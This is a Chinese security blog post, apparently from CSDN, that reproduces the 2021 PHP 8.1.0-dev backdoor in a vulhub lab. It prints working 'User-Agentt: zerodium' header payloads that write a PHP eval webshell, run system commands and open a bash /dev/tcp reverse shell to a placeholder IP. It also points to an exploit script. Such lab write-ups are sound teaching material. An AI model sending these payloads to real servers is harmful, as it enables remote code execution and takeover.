PHP 8.1.0-dev后门复现

0x01 简介

PHP verion 8.1.0-dev于2021年3月28日被植入后门,但是后门很快被发现并删除。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来执行任意代码。

0x02 影响版本

PHP 8.1.0-dev

0x03 环境搭建

使用vulhub进行搭建: 

cd vulhub/php/8.1-backdoor
sudo docker-compose up -d

访问主页:

http://ip:8080

44cafcda5b25d2879494863f5358a55e.png

0x04 漏洞复现

后门存在于user-agentt:zerodium字段,后面加上相应的php函数,得到执行结果:

2f548e1c3780f242325828795b1ed2b8.png

我们再来查看phpinfo(),通过浏览器插件Modify Header,点击Open options page,修改该网站的Headers:

55ec4873cd1bbcaed5e6b7a57934bed7.png

221140c8cbc854428235dad86916a3ad.png

30daf5a5af99c0f0dc0abb5674135e4a.png

再来执行写入shell:

User-Agentt: zerodiumfile_put_contents('indes.php','<?php eval($_POST["xx11"]);?>');

a30c40ac035bf1d7efa2a25ea1b7cf37.png

连接成功:

75c11996f7cc107b414955879463dead.png

执行命令:

User-Agentt: zerodiumsystem("id");

0a27086c5aaed3d3e4279a4917e19f32.png

反弹shell:

User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/IP/8000 0>&1'");

82fbc02607dad6b8b7c392829315d5a6.png

EXP:

python3 PHP-8.1.0-dev-Backdoor-RCE.py -u http://ip:8080 -c id

89ec81e5e60916fac733367f34085e28.png

exp后台回复php-8.1.0-dev获取。

0x05修复建议

1、建议更换版本

长按下方图片关注我们:

2dc4658b80f5ca5b13500de979294004.jpeg

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值